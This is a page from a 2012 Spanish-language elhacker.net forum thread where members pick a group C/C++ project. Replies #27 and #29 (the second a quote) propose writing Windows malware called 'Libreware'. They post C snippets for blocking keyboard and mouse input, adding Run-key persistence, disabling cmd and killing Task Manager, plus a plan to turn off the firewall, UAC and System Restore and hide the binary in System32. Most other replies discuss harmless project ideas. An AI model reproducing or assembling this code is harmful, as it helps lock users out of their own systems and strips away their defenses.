elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Proyecto C/C++
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 Ir Abajo Respuesta Imprimir
Autor Tema: Proyecto C/C++  (Leído 43,030 veces)
lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #20 en: 23 Septiembre 2012, 19:18 pm »

pues a ver si se te ocurre algo y nos lo cuentas a todos (un poco más sencillo, para que los que no sabemos tanto nos podamos enterar xD)
gracias a todos por contribuir, yo sigo buscando un tema.

Si queréis dejamos unos días para pensar el tema y luego decidimos
de momento nos quedamos con La agenda, ya que es el único que tenemos


En línea

flony


Desconectado Desconectado

Mensajes: 583



Ver Perfil
Re: Proyecto C/C++
« Respuesta #21 en: 23 Septiembre 2012, 19:42 pm »

lastima yo tambin soy nivel basico...epro en c++ ..de todas formas me anoto


En línea

si un problema no tiene solucion entonces no es un problema...es algo inevitable
Caster


Desconectado Desconectado

Mensajes: 786


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #22 en: 23 Septiembre 2012, 19:53 pm »


Yo tengo experiencia en MinGW y en algunas librerías (libCurl, OpenCL, Pthreads, OpenSSL) Mi idea era mas como añadirle IA al aircrack (hacer un fork) que se automatizara al 100% (No como airoscript) mas automático aun

También tenia la idea de desarrollar un Elcomsoft Distribuid Password Recovery pero multiplataforma =)

Empecemos por algo mas simple para que pueda participar el mayor numero de gente jajaja
En línea

lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #23 en: 23 Septiembre 2012, 20:10 pm »

mm, ok
yo propongo un tema (que no se si es difícil o no) que llevo mucho tiempo queriendo hacer pero nunca se me dio la oportunidad.
Sería algo relacionado con los antivirus y el malware (programar un antivirus o lo que sea xD)
lo añado en la lista de temas del primer mensaje y vosotros me decís que os parece
En línea

DickGumshoe


Desconectado Desconectado

Mensajes: 480



Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #24 en: 23 Septiembre 2012, 20:12 pm »

mm, ok
yo propongo un tema (que no se si es difícil o no) que llevo mucho tiempo queriendo hacer pero nunca se me dio la oportunidad.
Sería algo relacionado con los antivirus y el malware (programar un antivirus o lo que sea xD)
lo añado en la lista de temas del primer mensaje y vosotros me decís que os parece

La idea bien está. No sé cómo se hará un antivirus, pero me imagino que será muy difícil...
En línea

Caster


Desconectado Desconectado

Mensajes: 786


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #25 en: 23 Septiembre 2012, 20:13 pm »

Otra idea que se me acaba ocurrir, ya es algo complejo creo yo, yo no sabria hacer nada, seria un Chat tipo IRC que conecte a los ordeandores de una LAN por su IP privada para poder comunicarse entre ellos, o que se abra un servidor en uno de los ordenadores de la LAN y el resto ejecuten los clientes y se conecten todo al host que seria donde esta abierto el servidor.
En línea

lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #26 en: 23 Septiembre 2012, 20:19 pm »

Muy buena idea Casper,
por mi me quedaba con la tuya, a ver que dicen los demás

voy a investigar un poco de como se tendría que hacer esto
En línea

Dryken

Desconectado Desconectado

Mensajes: 117


El arte de vencer se aprende en las derrotas


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #27 en: 23 Septiembre 2012, 20:31 pm »

La idea del malware me interesa, llevo tiempo queriendo hacer uno pero hay muchas funciones que no soy capaz de sacar...desbloquear panel de control, desbloquear cmd, desbloquear regedit, añadir al registro para iniciar con windows.

POR FAVOR, ELIJAMOS UN PROYECTO YA Y NO CAMBIEMOS MAS DE IDEA, cojamos este si os parece.

Nombre sugerido... Libreware

Bloquear Teclado y ratón

Código
  1. #include <winable.h>
  2. BlockInput(true);
  3. Sleep(20000);
  4. BlockInput(false);

Copiar al registro

Código
  1. HKEY hkey;
  2. RegOpenKeyEx
  3. (HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
  4. RegSetValueEx(hkey,"Nombre",0,REG_SZ,(const unsigned char*)"C:\\Ruta\\",sizeof"C:\\Ruta\\");        
  5. RegCloseKey(hkey);


Desactivar cmd No me funciona

Código
  1.  
  2. DWORD dwVal = 1;
  3. HKEY hKey;
  4. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Windows\\System", 0, KEY_ALL_ACCESS, &hKey);
  5. RegSetValueEx (hKey, "DisableCMD", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
  6. RegCloseKey(hKey);

Desctivar administrador de tareas No me funciona

Código
  1. HWND TaskMgr;
  2. TaskMgr = FindWindow(NULL,"Windows Task Manager");
  3. if(TaskMgr != NULL) {
  4. PostMessage(TaskMgr,WM_CLOSE,(LPARAM)0,(WPARAM)0);
  5. }

Los pasos que necesitaremos serán estos:

1-Desactivar Firewall.
2-Desactivar UAC.
3-Pegar el PE a Windows/System32
4-Copiarse al registro el Acceso Directo.
5-No deja acceder al usuario al registro (que diga que el admin lo ha desabilitado).
6-Desactivar el Restaurar Sistema.
7-Cerrar procesos

Ventanas Emergentes       
Citar
     
    Boton Ok                MessageBox(NULL, "TEXTO", "TITULO",MB_OK);
     OK y cancel            MessageBox(NULL, "¿Cerrar?", "Test", MB_OKCANCEL);
     Yes, No y cancel     MessageBox(NULL, "¿Cerrar?", "Test", MB_YESNOCANCEL);
     Boton Aceptar         MessageBox(NULL, "¿Cerrar?", "Test", MB_ICONINFORMATION );

Ejecuta ventanas         
                                 
Citar
ShellExecute(NULL, "open","cmd.exe", "ipconfig", NULL, SW_SHOW);

Ocultar la ventana de MS-DOS                
                                 
Citar
FreeConsole();

Oculta la ventana de MS-DOS y WINDOWS,  las 2 lineas
                                 
Citar
HWND ventana=GetForegroundWindow();
                                  ShowWindow(ventana,SW_HIDE);

Pues venga, con todo esto ya tenemos una idea basica, pues empecemos al tema. Lo primero estructurar el code.

 

En línea

Lo intentas y fracasas, lo intentas y fracasas pero fracasas realmente cuando dejas de intentarlo.

Calc Don v0.7 - C
http://foro.elhacker.net/programacion_cc/source_calculadora_calc_don_10-t366489.0.html

Hundir la flota v0.3 - C#
http://foro.elhacker.net/net/source_c_juego_hundir_la_flota_v01-t377794.0.html
тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #28 en: 23 Septiembre 2012, 20:33 pm »

Yo ya tengo un chat programado en Winsock (win)

os puedo ayudar un poco en lo que querais
En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Proyecto C/C++
« Respuesta #29 en: 23 Septiembre 2012, 20:33 pm »

La idea del malware me interesa, llevo tiempo queriendo hacer uno pero hay muchas funciones que no soy capaz de sacar...desbloquear panel de control, desbloquear cmd, desbloquear regedit, añadir al registro para iniciar con windows.

POR FAVOR, ELIJAMOS UN PROYECTO YA Y NO CAMBIEMOS MAS DE IDEA, cojamos este si os parece.

Nombre sugerido... Libreware

Bloquear Teclado y ratón

Código
  1. #include <winable.h>
  2. BlockInput(true);
  3. Sleep(20000);
  4. BlockInput(false);

Copiar al registro

Código
  1. HKEY hkey;
  2. RegOpenKeyEx
  3. (HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
  4. RegSetValueEx(hkey,"Nombre",0,REG_SZ,(const unsigned char*)"C:\\Ruta\\",sizeof"C:\\Ruta\\");        
  5. RegCloseKey(hkey);


Desactivar cmd No me funciona

Código
  1.  
  2. DWORD dwVal = 1;
  3. HKEY hKey;
  4. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Windows\\System", 0, KEY_ALL_ACCESS, &hKey);
  5. RegSetValueEx (hKey, "DisableCMD", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
  6. RegCloseKey(hKey);

Desctivar administrador de tareas No me funciona

Código
  1. HWND TaskMgr;
  2. TaskMgr = FindWindow(NULL,"Windows Task Manager");
  3. if(TaskMgr != NULL) {
  4. PostMessage(TaskMgr,WM_CLOSE,(LPARAM)0,(WPARAM)0);
  5. }

Los pasos que necesitaremos serán estos:

1-Desactivar Firewall.
2-Desactivar UAC.
3-Pegar el PE a Windows/System32
4-Copiarse al registro el Acceso Directo.
5-No deja acceder al usuario al registro (que diga que el admin lo ha desabilitado).
6-Desactivar el Restaurar Sistema.
7-Cerrar procesos

Ventanas Emergentes       
Ejecuta ventanas         
                                  
Ocultar la ventana de MS-DOS                
                                  
Oculta la ventana de MS-DOS y WINDOWS,  las 2 lineas
                                  
Pues venga, con todo esto ya tenemos una idea basica, pues empecemos al tema. Lo primero estructurar el code.

 



A mi me gustaria el tema malware/antivirus, pero como dije en mi primer post, no voy a participar en un programa para windows. Ademas, me parece que malware para windows hay mucho, es ser muy poco original.
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
PROYECTO
Diseño Gráfico
kåhjî£ 1 2,620 Último mensaje 30 Julio 2004, 08:00 am
por Morris
Proyecto php « 1 2 ... 11 12 »
Sugerencias y dudas sobre el Foro
programatrix 111 27,230 Último mensaje 18 Septiembre 2005, 12:27 pm
por programatrix
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines